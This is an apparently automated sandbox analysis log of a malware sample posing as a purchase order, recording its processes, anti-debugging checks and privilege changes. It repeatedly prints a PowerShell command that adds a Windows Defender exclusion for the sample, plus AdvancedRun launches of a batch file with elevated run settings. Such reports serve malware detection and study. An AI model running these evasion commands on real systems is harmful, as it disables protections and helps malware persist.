                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeCode function: 32_2_010D28B8 LdrInitializeThunk,
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Adds a directory exclusion to Windows DefenderShow sources
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /SpecialRun 4101d8 4436
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /SpecialRun 4101d8 5204
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
